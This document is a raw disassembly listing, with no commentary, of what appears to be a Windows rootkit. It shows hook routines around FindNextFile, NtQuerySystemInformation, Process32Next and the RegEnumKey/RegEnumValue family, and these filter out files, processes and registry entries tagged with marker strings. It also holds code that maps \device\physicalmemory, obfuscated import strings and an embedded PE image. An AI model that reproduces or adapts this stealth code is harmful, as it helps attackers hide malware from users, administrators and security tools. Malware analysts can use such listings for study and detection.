dd offset loc_402008
dd offset loc_401E00
dd offset loc_401E00
dd offset loc_401E00
dd offset loc_401E00
dd offset loc_401E00
dd offset loc_401E00
dd offset loc_401E00
dd offset loc_401E00
dd offset loc_401E00
dd offset loc_401E00
dd offset loc_401E00
dd offset loc_401E00
dd offset loc_401E00
dd offset loc_401E00
dd offset loc_401E00
dd offset loc_401E00
dd offset loc_401F00
dd offset loc_401F12
dd offset loc_401F00
dd offset loc_401F00
dd offset loc_401D9A
dd offset loc_401D9A
dd offset loc_401D9A
dd offset loc_401D9A
dd offset loc_401D9A
dd offset loc_401D9A
dd offset loc_401D9A
dd offset loc_401D9A
off_43C4F4 dd offset loc_401D9A ; DATA XREF: sub_401D0D+2AA�r
dd offset loc_401D9A
dd offset loc_401D9A
dd offset loc_401D9A
dd offset loc_402008
dd offset loc_402008
dd offset loc_402008
dd offset loc_402008
dd offset loc_402008
dd offset loc_402008
dd offset loc_402008
dd offset loc_402008
dd offset loc_402008
dd offset loc_402008
dd offset loc_401F29
dd offset loc_402008
dd offset loc_402008
dd offset loc_402008
dd offset loc_402008
dd offset loc_402008
dd offset loc_401F3C
dd offset loc_401F3C
dd offset loc_401F3C
dd offset loc_401F3C
dd offset loc_402008
dd offset loc_402008
dd offset loc_402008
dd offset loc_402008
dd offset loc_401E00
dd offset loc_401F4C
dd offset loc_402008
dd offset loc_402008
dd offset loc_402008
dd offset loc_402008
dd offset loc_402008
dd offset loc_402008
dd offset loc_401E00
dd offset loc_401E00
dd offset loc_401E00
dd offset loc_401E00
dd offset loc_401E00
dd offset loc_401E00
dd offset loc_401E00
dd offset loc_401E00
dd offset loc_401F4C
dd offset loc_401F4C
dd offset loc_401F4C
dd offset loc_401F4C
dd offset loc_401F4C
dd offset loc_401F4C
dd offset loc_401F4C
dd offset loc_401F4C
dd offset loc_401F00
dd offset loc_401F00
dd offset loc_401F62
dd offset loc_402008
dd offset loc_401D9A
dd offset loc_401D9A
dd offset loc_401F00
dd offset loc_401F12
dd offset loc_401F6E
dd offset loc_402008
dd offset loc_401F62
dd offset loc_402008
dd offset loc_402008
dd offset loc_401DAC
dd offset loc_402008
dd offset loc_402008
dd offset loc_401D9A
dd offset loc_401D9A
dd offset loc_401D9A
dd offset loc_401D9A
dd offset loc_401E00
dd offset loc_401E00
dd offset loc_402008
dd offset loc_402008
dd offset loc_401D9A
dd offset loc_401D9A
dd offset loc_401D9A
dd offset loc_401D9A
dd offset loc_401D9A
dd offset loc_401D9A
dd offset loc_401D9A
dd offset loc_401D9A
dd offset loc_401E00
dd offset loc_401E00
dd offset loc_401E00
dd offset loc_401E00
dd offset loc_401E00
dd offset loc_401E00
dd offset loc_401E00
dd offset loc_401E00
dd offset loc_401F4C
dd offset loc_401F4C
dd offset loc_401F29
dd offset loc_401E00
dd offset loc_402008
dd offset loc_402008
dd offset loc_402008
dd offset loc_402008
dd offset loc_401E48
dd offset loc_401F7A
dd offset loc_401E74
dd offset loc_401E74
dd offset loc_402008
dd offset loc_402008
dd offset loc_401DC7
dd offset loc_401DC7
dd offset loc_402008
dd offset loc_402008
dd offset loc_402008
dd offset loc_402008
dd offset loc_402008
dd offset loc_402008
dd offset loc_401D9A
dd offset loc_401D9A
off_43C6C4 dd offset loc_401FC3 ; DATA XREF: sub_401D0D+295�r
dd offset loc_401FC3
dd offset loc_401FC3
dd offset loc_401FC3
dd offset loc_402001
dd offset loc_402001
dd offset loc_402008
dd offset loc_402001
dd offset loc_402008
dd offset loc_402008
dd offset loc_402008
dd offset loc_402008
dd offset loc_401FE5
dd offset loc_401FE5
dd offset loc_401FE5
dd offset loc_401FE5
dd offset loc_401FE5
dd offset loc_401FE5
dd offset loc_401FE5
dd offset loc_401FE5
dd offset loc_401FE5
dd offset loc_401FE5
dd offset loc_401FE5
dd offset loc_401FE5
dd offset loc_401FE5
dd offset loc_401FE5
dd offset loc_401FE5
dd offset loc_401FE5
dd offset loc_401FC3
dd offset loc_401FC3
dd offset loc_401FC3
dd offset loc_401FC3
dd offset loc_401FC3
dd offset loc_401FC3
dd offset loc_401FC3
dd offset loc_401FC3
dd offset loc_401FC3
dd offset loc_401FC3
dd offset loc_401FC3
dd offset loc_401FC3
dd offset loc_401FC3
dd offset loc_401FC3
dd offset loc_401FC3
dd offset loc_401FC3
dd offset loc_402008
dd offset loc_402008
dd offset loc_402008
dd offset loc_401FC3
dd offset loc_401FF2
dd offset loc_401FC3
dd offset loc_402001
dd offset loc_402001
dd offset loc_402008
dd offset loc_402008
dd offset loc_402008
dd offset loc_401FC3
dd offset loc_401FF2
dd offset loc_401FC3
dd offset loc_402001
dd offset loc_401FC3
dd offset loc_401FC3
dd offset loc_401FC3
dd offset loc_401FC3
dd offset loc_401FC3
dd offset loc_401FC3
dd offset loc_401FC3
dd offset loc_401FC3
dd offset loc_401FC3
dd offset loc_402001
dd offset loc_402001
dd offset loc_401FF2
dd offset loc_401FC3
dd offset loc_401FC3
dd offset loc_401FC3
dd offset loc_401FC3
dd offset loc_401FC3
dd offset loc_401FC3
dd offset loc_401FC3
dd offset loc_402001
dd offset loc_402001
dd offset loc_402001
dd offset loc_402001
dd offset loc_402001
dd offset loc_402001
dd offset loc_402008
dd offset loc_402008
dd offset loc_402008
dd offset loc_402008
dd offset loc_402008
dd offset loc_402008
dd offset loc_402008
dd offset loc_402008
aFindnextfilea db 'FindNextFileA',0
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 18h
mov [esp+8], edi
mov [esp+4], esi
mov [esp], ebx
loc_43C853: ; CODE XREF: .data:0043C89C�j
push dword ptr [ebp+0Ch]
push dword ptr [ebp+8]
call near ptr 245CA60h
test eax, eax
jz short loc_43C89E
pusha
mov eax, [ebp+0Ch]
add eax, 2Ch
mov ebx, eax
loc_43C86D: ; CODE XREF: .data:0043C873�j
cmp byte ptr [ebx], 0
jz short loc_43C875
inc ebx
jmp short loc_43C86D
; ---------------------------------------------------------------------------
loc_43C875: ; CODE XREF: .data:0043C870�j
mov word ptr [ebx], 463Ah
inc ebx
inc ebx
push dword ptr [ebx]
mov word ptr [ebx], 0
push ebx
push eax
call near ptr 0C4FD496h
pop ebx
pop dword ptr [ebx]
mov word ptr [ebx-2], 0
test ax, ax
jnz short loc_43C89B
popa
jmp short loc_43C89E
; ---------------------------------------------------------------------------
loc_43C89B: ; CODE XREF: .data:0043C896�j
popa
jmp short loc_43C853
; ---------------------------------------------------------------------------
loc_43C89E: ; CODE XREF: .data:0043C860�j
; .data:0043C899�j
mov ebx, [esp]
mov esi, [esp+4]
mov edi, [esp+8]
mov esp, ebp
pop ebp
retn 8
; ---------------------------------------------------------------------------
db 0FFh
dd 0FFFFFFFFh, 6E694600h, 78654E64h, 6C694674h
db 65h, 57h, 0
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 18h
mov [esp+8], edi
mov [esp+4], esi
mov [esp], ebx
loc_43C8D4: ; CODE XREF: .data:0043C923�j
push dword ptr [ebp+0Ch]
push dword ptr [ebp+8]
call near ptr 245CAE1h
test eax, eax
jz short loc_43C925
pusha
mov eax, [ebp+0Ch]
add eax, 2Ch
mov ebx, eax
loc_43C8EE: ; CODE XREF: .data:0043C8F6�j
cmp word ptr [ebx], 0
jz short loc_43C8F8
inc ebx
inc ebx
jmp short loc_43C8EE
; ---------------------------------------------------------------------------
loc_43C8F8: ; CODE XREF: .data:0043C8F2�j
mov dword ptr [ebx], 46003Ah
add ebx, 4
push dword ptr [ebx]
mov dword ptr [ebx], 0
push ebx
push eax
call near ptr 0D50D61Dh
pop ebx
pop dword ptr [ebx]
mov dword ptr [ebx-4], 0
test ax, ax
jnz short loc_43C922
popa
jmp short loc_43C925
; ---------------------------------------------------------------------------
loc_43C922: ; CODE XREF: .data:0043C91D�j
popa
jmp short loc_43C8D4
; ---------------------------------------------------------------------------
loc_43C925: ; CODE XREF: .data:0043C8E1�j
; .data:0043C920�j
mov ebx, [esp]
mov esi, [esp+4]
mov edi, [esp+8]
mov esp, ebp
pop ebp
retn 8
; ---------------------------------------------------------------------------
dw 0FFFFh
dword_43C938 dd 0FFFFFFh, 7551744Eh, 53797265h, 65747379h, 666E496Dh
; DATA XREF: .data:0043CE84�o
dd 616D726Fh, 6E6F6974h
db 0
; ---------------------------------------------------------------------------
loc_43C955: ; DATA XREF: .data:0043CE8C�o
push ebp
mov ebp, esp
sub esp, 24h
mov [esp+8], edi
mov [esp+4], esi
mov [esp], ebx
sub esp, 10h
mov eax, [ebp+14h]
mov edi, [ebp+10h]
mov ebx, [ebp+0Ch]
mov [esp+0Ch], eax
mov [esp+8], edi
mov [esp+4], ebx
mov esi, [ebp+8]
mov [esp], esi
call near ptr 245CB8Bh
mov [ebp-4], eax
cmp esi, 5
jz short loc_43C9A5
loc_43C991: ; CODE XREF: .data:0043C9AB�j
; .data:0043C9FE�j
mov eax, [ebp-4]
mov ebx, [esp]
mov esi, [esp+4]
mov edi, [esp+8]
mov esp, ebp
pop ebp
retn 10h
; ---------------------------------------------------------------------------
loc_43C9A5: ; CODE XREF: .data:0043C98F�j
cmp edi, 1F40h
jle short loc_43C991
jmp short loc_43C9B3
; ---------------------------------------------------------------------------
loc_43C9AF: ; CODE XREF: .data:0043CA00�j
mov esi, ebx
loc_43C9B1: ; CODE XREF: .data:0043C9F8�j
add ebx, eax
loc_43C9B3: ; CODE XREF: .data:0043C9AD�j
pusha
mov eax, [ebx+44h]
push 50h
sub esp, 20h
xor ebx, ebx
loc_43C9C1: ; CODE XREF: .data:0043C9D4�j
bt eax, ebx
jb short loc_43C9CC
mov byte ptr [esp+ebx], 30h
jmp short loc_43C9D0
; ---------------------------------------------------------------------------
loc_43C9CC: ; CODE XREF: .data:0043C9C4�j
mov byte ptr [esp+ebx], 31h
loc_43C9D0: ; CODE XREF: .data:0043C9CA�j
inc ebx
cmp ebx, 20h
jnz short loc_43C9C1
push esp
call near ptr 0C4FD5E8h
add esp, 24h
test ax, ax
jnz short loc_43C9E7
popa
jmp short loc_43C9FA
; ---------------------------------------------------------------------------
loc_43C9E7: ; CODE XREF: .data:0043C9E2�j
popa
mov eax, [ebx]
test eax, eax
jnz short loc_43C9F6
mov dword ptr [esi], 0
jmp short loc_43C9FA
; ---------------------------------------------------------------------------
loc_43C9F6: ; CODE XREF: .data:0043C9EC�j
add [esi], eax
jmp short loc_43C9B1
; ---------------------------------------------------------------------------
loc_43C9FA: ; CODE XREF: .data:0043C9E5�j
; .data:0043C9F4�j
mov eax, [ebx]
test eax, eax
jz short loc_43C991
jmp short loc_43C9AF
; ---------------------------------------------------------------------------
dw 0FFFFh
dd 0FFFFFFh
aProcess32next db 'Process32Next',0 ; DATA XREF: .data:off_43CE74�o
word_43CA16 dw 8360h ; DATA XREF: .data:off_43CE7C�o
dd 46A08C5h, 0B0BE855h, 0C0850B0Bh, 0EB610374h, 458B610Bh
dd 1013D08h, 14740101h, 80808E8h, 1FF8108h, 74010101h
dd 1013D07h, 5750101h, 20202E9h
db 2
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
sub esp, 18h
mov [esp+8], edi
mov [esp+4], esi
mov [esp], ebx
loc_43CA5E: ; CODE XREF: .data:0043CAAC�j
sub esp, 8
mov ebx, [ebp+0Ch]
mov edi, [ebp+8]
mov [esp+4], ebx
mov [esp], edi
call near ptr 245CC75h
test eax, eax
jz short loc_43CAAE
pusha
mov eax, [ebx+8]
push 50h
sub esp, 20h
xor ebx, ebx
loc_43CA85: ; CODE XREF: .data:0043CA98�j
bt eax, ebx
jb short loc_43CA90
mov byte ptr [esp+ebx], 30h
jmp short loc_43CA94
; ---------------------------------------------------------------------------
loc_43CA90: ; CODE XREF: .data:0043CA88�j
mov byte ptr [esp+ebx], 31h
loc_43CA94: ; CODE XREF: .data:0043CA8E�j
inc ebx
cmp ebx, 20h
jnz short loc_43CA85
push esp
call near ptr 0C4FD6ACh
add esp, 24h
test ax, ax
jnz short loc_43CAAB
popa
jmp short loc_43CAAE
; ---------------------------------------------------------------------------
loc_43CAAB: ; CODE XREF: .data:0043CAA6�j
popa
jmp short loc_43CA5E
; ---------------------------------------------------------------------------
loc_43CAAE: ; CODE XREF: .data:0043CA75�j
; .data:0043CAA9�j
mov ebx, [esp]
mov esi, [esp+4]
mov edi, [esp+8]
mov esp, ebp
pop ebp
retn 8
; ---------------------------------------------------------------------------
db 0FFh
dd 0FFFFFFFFh, 67655200h, 6D756E45h, 4179654Bh
db 0
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
loc_43CAD4: ; CODE XREF: .data:0043CB21�j
push dword ptr [ebp+14h]
push dword ptr [ebp+10h]
push dword ptr [ebp+0Ch]
push dword ptr [ebp+8]
call near ptr 245CCE7h
test eax, eax
jnz short loc_43CB23
pusha
mov eax, [ebp+10h]
mov ebx, eax
loc_43CAEF: ; CODE XREF: .data:0043CAF5�j
cmp byte ptr [ebx], 0
jz short loc_43CAF7
inc ebx
jmp short loc_43CAEF
; ---------------------------------------------------------------------------
loc_43CAF7: ; CODE XREF: .data:0043CAF2�j
mov word ptr [ebx], 4B23h
inc ebx
inc ebx
push dword ptr [ebx]
mov word ptr [ebx], 0
push ebx
push eax
call near ptr 0C4FD718h
pop ebx
pop dword ptr [ebx]
mov word ptr [ebx-2], 0
test ax, ax
jnz short loc_43CB1D
popa
jmp short loc_43CB23
; ---------------------------------------------------------------------------
loc_43CB1D: ; CODE XREF: .data:0043CB18�j
popa
inc dword ptr [ebp+0Ch]
jmp short loc_43CAD4
; ---------------------------------------------------------------------------
loc_43CB23: ; CODE XREF: .data:0043CAE7�j
; .data:0043CB1B�j
pop ebp
retn 10h
; ---------------------------------------------------------------------------
db 0FFh
dd 0FFFFFFFFh, 67655200h, 6D756E45h, 5779654Bh
db 0
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
loc_43CB3C: ; CODE XREF: .data:0043CB8F�j
push dword ptr [ebp+14h]
push dword ptr [ebp+10h]
push dword ptr [ebp+0Ch]
push dword ptr [ebp+8]
call near ptr 245CD4Fh
test eax, eax
jnz short loc_43CB91
pusha
mov eax, [ebp+10h]
mov ebx, eax
loc_43CB57: ; CODE XREF: .data:0043CB5F�j
cmp word ptr [ebx], 0
jz short loc_43CB61
inc ebx
inc ebx
jmp short loc_43CB57
; ---------------------------------------------------------------------------
loc_43CB61: ; CODE XREF: .data:0043CB5B�j
mov dword ptr [ebx], 4B0023h
add ebx, 4
push dword ptr [ebx]
mov dword ptr [ebx], 0
push ebx
push eax
call near ptr 0D50D886h
pop ebx
pop dword ptr [ebx]
mov dword ptr [ebx-4], 0
test ax, ax
jnz short loc_43CB8B
popa
jmp short loc_43CB91
; ---------------------------------------------------------------------------
loc_43CB8B: ; CODE XREF: .data:0043CB86�j
popa
inc dword ptr [ebp+0Ch]
jmp short loc_43CB3C
; ---------------------------------------------------------------------------
loc_43CB91: ; CODE XREF: .data:0043CB4F�j
; .data:0043CB89�j
pop ebp
retn 10h
; ---------------------------------------------------------------------------
db 3 dup(0FFh)
dword_43CB98 dd 5200FFFFh, 6E456765h, 654B6D75h, 57784579h db 0
; ---------------------------------------------------------------------------
loc_43CBA9: ; DATA XREF: .data:0043CEDC�o
push ebp
mov ebp, esp
loc_43CBAC: ; CODE XREF: .data:0043CC27�j
mov eax, [ebp+14h]
push dword ptr [eax]
mov eax, [ebp+20h]
test eax, eax
jz short loc_43CBBA
push dword ptr [eax]
loc_43CBBA: ; CODE XREF: .data:0043CBB6�j
push dword ptr [ebp+24h]
push dword ptr [ebp+20h]
push dword ptr [ebp+1Ch]
push dword ptr [ebp+18h]
push dword ptr [ebp+14h]
push dword ptr [ebp+10h]
push dword ptr [ebp+0Ch]
push dword ptr [ebp+8]
call near ptr 245CDD9h
test eax, eax
jnz short loc_43CC29
pusha
mov eax, [ebp+10h]
mov ebx, eax
loc_43CBE1: ; CODE XREF: .data:0043CBE9�j
cmp word ptr [ebx], 0
jz short loc_43CBEB
inc ebx
inc ebx
jmp short loc_43CBE1
; ---------------------------------------------------------------------------
loc_43CBEB: ; CODE XREF: .data:0043CBE5�j
mov dword ptr [ebx], 4B0023h
add ebx, 4
push dword ptr [ebx]
mov dword ptr [ebx], 0
push ebx
push eax
call near ptr 0D50D910h
pop ebx
pop dword ptr [ebx]
mov dword ptr [ebx-4], 0
test ax, ax
jnz short loc_43CC15
popa
jmp short loc_43CC29
; ---------------------------------------------------------------------------
loc_43CC15: ; CODE XREF: .data:0043CC10�j
popa
inc dword ptr [ebp+0Ch]
mov eax, [ebp+20h]
test eax, eax
jz short loc_43CC22
pop dword ptr [eax]
loc_43CC22: ; CODE XREF: .data:0043CC1E�j
mov eax, [ebp+14h]
pop dword ptr [eax]
jmp short loc_43CBAC
; ---------------------------------------------------------------------------
loc_43CC29: ; CODE XREF: .data:0043CBD9�j
; .data:0043CC13�j
add esp, 4
cmp dword ptr [ebp+20h], 0
jz short loc_43CC35
add esp, 4
loc_43CC35: ; CODE XREF: .data:0043CC30�j
pop ebp
retn 20h
; ---------------------------------------------------------------------------
db 3 dup(0FFh)
dd 5200FFFFh, 6E456765h, 654B6D75h, 41784579h
db 0
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
loc_43CC50: ; CODE XREF: .data:0043CCC5�j
mov eax, [ebp+14h]
push dword ptr [eax]
mov eax, [ebp+20h]
test eax, eax
jz short loc_43CC5E
push dword ptr [eax]
loc_43CC5E: ; CODE XREF: .data:0043CC5A�j
push dword ptr [ebp+24h]
push dword ptr [ebp+20h]
push dword ptr [ebp+1Ch]
push dword ptr [ebp+18h]
push dword ptr [ebp+14h]
push dword ptr [ebp+10h]
push dword ptr [ebp+0Ch]
push dword ptr [ebp+8]
call near ptr 245CE7Dh
test eax, eax
jnz short loc_43CCC7
pusha
mov eax, [ebp+10h]
mov ebx, eax
loc_43CC85: ; CODE XREF: .data:0043CC8B�j
cmp byte ptr [ebx], 0
jz short loc_43CC8D
inc ebx
jmp short loc_43CC85
; ---------------------------------------------------------------------------
loc_43CC8D: ; CODE XREF: .data:0043CC88�j
mov word ptr [ebx], 4B23h
inc ebx
inc ebx
push dword ptr [ebx]
mov word ptr [ebx], 0
push ebx
push eax
call near ptr 0C4FD8AEh
pop ebx
pop dword ptr [ebx]
mov word ptr [ebx-2], 0
test ax, ax
jnz short loc_43CCB3
popa
jmp short loc_43CCC7
; ---------------------------------------------------------------------------
loc_43CCB3: ; CODE XREF: .data:0043CCAE�j
popa
inc dword ptr [ebp+0Ch]
mov eax, [ebp+20h]
test eax, eax
jz short loc_43CCC0
pop dword ptr [eax]
loc_43CCC0: ; CODE XREF: .data:0043CCBC�j
mov eax, [ebp+14h]
pop dword ptr [eax]
jmp short loc_43CC50
; ---------------------------------------------------------------------------
loc_43CCC7: ; CODE XREF: .data:0043CC7D�j
; .data:0043CCB1�j
add esp, 4
cmp dword ptr [ebp+20h], 0
jz short loc_43CCD3
add esp, 4
loc_43CCD3: ; CODE XREF: .data:0043CCCE�j
pop ebp
retn 20h
; ---------------------------------------------------------------------------
db 0FFh
dword_43CCD8 dd 0FFFFFFFFh, 67655200h, 6D756E45h, 756C6156h db 65h, 57h, 0
; ---------------------------------------------------------------------------
loc_43CCEB: ; DATA XREF: .data:0043CEFC�o
push ebp
mov ebp, esp
loc_43CCEE: ; CODE XREF: .data:0043CD69�j
mov eax, [ebp+14h]
push dword ptr [eax]
mov eax, [ebp+24h]
test eax, eax
jz short loc_43CCFC
push dword ptr [eax]
loc_43CCFC: ; CODE XREF: .data:0043CCF8�j
push dword ptr [ebp+24h]
push dword ptr [ebp+20h]
push dword ptr [ebp+1Ch]
push dword ptr [ebp+18h]
push dword ptr [ebp+14h]
push dword ptr [ebp+10h]
push dword ptr [ebp+0Ch]
push dword ptr [ebp+8]
call near ptr 245CF1Bh
test eax, eax
jnz short loc_43CD6B
pusha
mov eax, [ebp+10h]
mov ebx, eax
loc_43CD23: ; CODE XREF: .data:0043CD2B�j
cmp word ptr [ebx], 0
jz short loc_43CD2D
inc ebx
inc ebx
jmp short loc_43CD23
; ---------------------------------------------------------------------------
loc_43CD2D: ; CODE XREF: .data:0043CD27�j
mov dword ptr [ebx], 560023h
add ebx, 4
push dword ptr [ebx]
mov dword ptr [ebx], 0
push ebx
push eax
call near ptr 0D50DA52h
pop ebx
pop dword ptr [ebx]
mov dword ptr [ebx-4], 0
test ax, ax
jnz short loc_43CD57
popa
jmp short loc_43CD6B
; ---------------------------------------------------------------------------
loc_43CD57: ; CODE XREF: .data:0043CD52�j
popa
inc dword ptr [ebp+0Ch]
mov eax, [ebp+24h]
test eax, eax
jz short loc_43CD64
pop dword ptr [eax]
loc_43CD64: ; CODE XREF: .data:0043CD60�j
mov eax, [ebp+14h]
pop dword ptr [eax]
jmp short loc_43CCEE
; ---------------------------------------------------------------------------
loc_43CD6B: ; CODE XREF: .data:0043CD1B�j
; .data:0043CD55�j
add esp, 4
cmp dword ptr [ebp+24h], 0
jz short loc_43CD77
add esp, 4
loc_43CD77: ; CODE XREF: .data:0043CD72�j
pop ebp
retn 20h
; ---------------------------------------------------------------------------
db 0FFh
dd 0FFFFFFFFh, 67655200h, 6D756E45h, 756C6156h
db 65h, 41h, 0
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
loc_43CD92: ; CODE XREF: .data:0043CE07�j
mov eax, [ebp+14h]
push dword ptr [eax]
mov eax, [ebp+24h]
test eax, eax
jz short loc_43CDA0
push dword ptr [eax]
loc_43CDA0: ; CODE XREF: .data:0043CD9C�j
push dword ptr [ebp+24h]
push dword ptr [ebp+20h]
push dword ptr [ebp+1Ch]
push dword ptr [ebp+18h]
push dword ptr [ebp+14h]
push dword ptr [ebp+10h]
push dword ptr [ebp+0Ch]
push dword ptr [ebp+8]
call near ptr 245CFBFh
test eax, eax
jnz short loc_43CE09
pusha
mov eax, [ebp+10h]
mov ebx, eax
loc_43CDC7: ; CODE XREF: .data:0043CDCD�j
cmp byte ptr [ebx], 0
jz short loc_43CDCF
inc ebx
jmp short loc_43CDC7
; ---------------------------------------------------------------------------
loc_43CDCF: ; CODE XREF: .data:0043CDCA�j
mov word ptr [ebx], 5623h
inc ebx
inc ebx
push dword ptr [ebx]
mov word ptr [ebx], 0
push ebx
push eax
call near ptr 0C4FD9F0h
pop ebx
pop dword ptr [ebx]
mov word ptr [ebx-2], 0
test ax, ax
jnz short loc_43CDF5
popa
jmp short loc_43CE09
; ---------------------------------------------------------------------------
loc_43CDF5: ; CODE XREF: .data:0043CDF0�j
popa
inc dword ptr [ebp+0Ch]
mov eax, [ebp+24h]
test eax, eax
jz short loc_43CE02
pop dword ptr [eax]
loc_43CE02: ; CODE XREF: .data:0043CDFE�j
mov eax, [ebp+14h]
pop dword ptr [eax]
jmp short loc_43CD92
; ---------------------------------------------------------------------------
loc_43CE09: ; CODE XREF: .data:0043CDBF�j
; .data:0043CDF3�j
add esp, 4
cmp dword ptr [ebp+24h], 0
jz short loc_43CE15
add esp, 4
loc_43CE15: ; CODE XREF: .data:0043CE10�j
pop ebp
retn 20h
; ---------------------------------------------------------------------------
db 3 dup(0FFh)
db 2 dup(0FFh), 0
aKernel32_dll db 'kernel32.dll',0 ; DATA XREF: sub_402AD6+3F4�o
; .data:off_43CE78�o
aNtdll_dll db 'ntdll.dll',0 ; DATA XREF: sub_402246+11�o
; .data:0043CE88�o ...
aAdvapi32_dll db 'advapi32.dll',0 ; DATA XREF: .data:0043CED8�o
; .data:0043CEF8�o
aIphlpapi_dll db 'iphlpapi.dll',0
aInetmib1_dll db 'inetmib1.dll',0
aWsock32_dll db 'wsock32.dll',0
aUser32_dll db 'user32.dll',0
off_43CE74 dd offset aProcess32next ; DATA XREF: sub_402AD6+E9�r
; sub_402AD6+11C�r ...
; "Process32Next"
off_43CE78 dd offset aKernel32_dll ; DATA XREF: sub_402AD6+BF�r
; "kernel32.dll"
off_43CE7C dd offset word_43CA16 ; DATA XREF: sub_4028B9+209�r
byte_43CE80 db 0 ; DATA XREF: sub_402AD6+76�r
; sub_402AD6+93�r
align 4
dd offset dword_43C938+4
dd offset aNtdll_dll ; "ntdll.dll"
dd offset loc_43C955
dd 1, 43C8B5h, 43CE1Fh, 43C8C3h, 1, 43C834h, 43CE1Fh, 43C842h
dd 2, 43CB2Dh, 43CE36h, 43CB39h, 1, 43CAC5h, 43CE36h, 43CAD1h
dd 0
dd offset dword_43CB98+3
dd offset aAdvapi32_dll ; "advapi32.dll"
dd offset loc_43CBA9
dd 1, 43CC3Fh, 43CE36h, 43CC4Dh, 0
dd offset dword_43CCD8+5
dd offset aAdvapi32_dll ; "advapi32.dll"
dd offset loc_43CCEB
dd 1, 43CD81h, 43CE36h, 43CD8Fh, 5 dup(0)
dd 2
dword_43CF28 dd 0Fh dword_43CF2C dd 0 ; .text:loc_4021CC�r ...
aRtlinitunicode db 'RtlInitUnicodeString',0 ; DATA XREF: sub_402246+1D�o
a8dv13 db '8D13+',0
aNtunmapviewofs db 'NtUnmapViewOfSection',0 ; DATA XREF: sub_402246+35�o
aAg db '+%aG',0
aNtopensection db 'NtOpenSection',0 ; DATA XREF: sub_402246+59�o
aZ_i6sw db 'z.I6SW',0
aNtmapviewofsec db 'NtMapViewOfSection',0 ; DATA XREF: sub_402246+74�o
db 0
aRtlntstatustod db 'RtlNtStatusToDosError',0 ; DATA XREF: sub_402246+89�o
aA_0 db '/A, ',0
aCurrent_user db 'CURRENT_USER',0 ; DATA XREF: sub_4022E4+A5�o
align 4
aDevicePhysical: ; DATA XREF: sub_4022E4+1C�o
unicode 0, <\device\physicalmemory>,0
dword_43CFE6 dd 346A2Eh a4efo@g db '4EFo@g^',0 ; DATA XREF: sub_402246+6C�o
dword_43CFF2 dd 6E6739h dword_43CFF6 dd 307725h word_43CFFA dw 3C6Ah ; DATA XREF: sub_4022E4+98�o
db 0
dword_43CFFD dd 503F21h align 4
dword_43D004 dd 1 ; sub_402AD6+5AA�r
dd 0Bh
dword_43D00C dd 0 ; .text:loc_40251A�r ...
aWcscmp db 'wcscmp',0 ; DATA XREF: .data:off_43D0B0�o
aFegH db 'feg:H',0
aHtons db 'htons',0
align 4
aVirtualprotect db 'VirtualProtect',0
aY3c db 'Y!~3c',0
aGetcurrentproc db 'GetCurrentProcessId',0
aP db 'p',0
aFindwindowa db 'FindWindowA',0
aGq db 'Q',0
aSendmessagea db 'SendMessageA',0
aRze db 'RZe~',0
aIsbadreadptr db 'IsBadReadPtr',0
aL@befm db 'l@EfM ',0
aGlobalfindatom db 'GlobalFindAtomA',0
db ' ',0
aGlobalfindat_0 db 'GlobalFindAtomW',0
aM_1 db 'M',0
align 4
byte_43D0AC db 3 ; DATA XREF: sub_40256D+A1�r
align 10h
off_43D0B0 dd offset aWcscmp ; DATA XREF: sub_40256D+119�r
; sub_40256D+18A�r
; "wcscmp"
off_43D0B4 dd offset aNtdll_dll ; DATA XREF: sub_40256D+106�r
; "ntdll.dll"
dd 5, 43D01Dh, 43CE5Dh, 7, 43D024h, 43CE1Fh, 8, 43D039h
dd 43CE1Fh, 9, 43D04Fh, 43CE69h, 0Ah, 43D05Eh, 43CE69h
dd 0Bh, 43D070h, 43CE1Fh, 0Ch, 43D085h, 43CE1Fh, 0Dh, 43D097h
dd 43CE1Fh
word_43D118 dw 33h ; DATA XREF: sub_40256D+14B�r
dword_43D11A dd 80332Fh aYmSu_ db 'ym SU _',0 ; DATA XREF: sub_40256D+309�o
aB_hir db 'b_HiR',0 ; DATA XREF: sub_4028B9+C�o
aNTe db '$n*-TE ',0 ; DATA XREF: sub_4028B9+36�o
word_43D134 dw 20h ; DATA XREF: sub_4028B9+1F4�r
a_jyp db '.jYP',0 ; DATA XREF: sub_402AD6+4F�o
dword_43D13B dd 577753h aV4r7 db '= ;v4R7',0 ; DATA XREF: sub_402AD6+262�o
word_43D147 dw 20h ; DATA XREF: sub_402AD6+2C2�r
aOx db ' ox $',0 ; DATA XREF: sub_402AD6+2E6�o
aNb db 'Nb',0 ; DATA XREF: sub_402AD6+5EE�o
aAa6 db '/aa6',0 ; DATA XREF: sub_402AD6+724�o
dword_43D157 dd 79794Dh align 4
dd 5, 11h
dword_43D164 dd 8 ; sub_40336C:loc_4033A2�r ...
dword_43D168 dd 824D517Fh db 0
aS db 'S=~/ ',0 ; DATA XREF: sub_4034C6+11�o
aW4 db '=',27h,'W#4~',0 ; DATA XREF: sub_4034C6+25�o
a0z db '0Z',0 ; DATA XREF: sub_4034C6+38�o
aPfoebK db 'pFoE#K',0 ; DATA XREF: sub_40355C+1E�o
byte_43D185 db 3 dup(0) ; DATA XREF: sub_40355C+9D�o
dword_43D188 dd 3 dd 0Fh
dword_43D190 dd 0 ; sub_40360B:loc_403630�r ...
byte_43D194 db 67h, 25h, 0 ; DATA XREF: sub_40369B+14�o
byte_43D197 db 62h ; DATA XREF: sub_403780+17�o
db 61h, 0
dword_43D19A dd 326C55h align 10h
dd 3, 0Dh
dword_43D1A8 dd 0 ; sub_4037DF:loc_40380D�r ...
byte_43D1AC db 6Bh, 48h, 0 ; DATA XREF: sub_403883+16�o
word_43D1AF dw 42h ; DATA XREF: sub_403883+23�r
aAluvia db 'LUVIa',0 ; DATA XREF: .text:00403926�o
dd 5, 0Eh
dword_43D1C0 dd 0DEh ; sub_4039E6:loc_403A0C�r ...
dword_43D1C4 dd 905A4Dh, 3, 4, 0FFFFh, 0B8h, 0 dd 40h, 8 dup(0)
dd 80h, 0EBA1F0Eh, 0CD09B400h, 4C01B821h, 685421CDh, 70207369h
dd 72676F72h, 63206D61h, 6F6E6E61h, 65622074h, 6E757220h
dd 206E6920h, 20534F44h, 65646F6Dh, 0A0D0D2Eh, 24h, 0
dd 4550h, 7014Ch, 427CB50Ah, 2 dup(0)
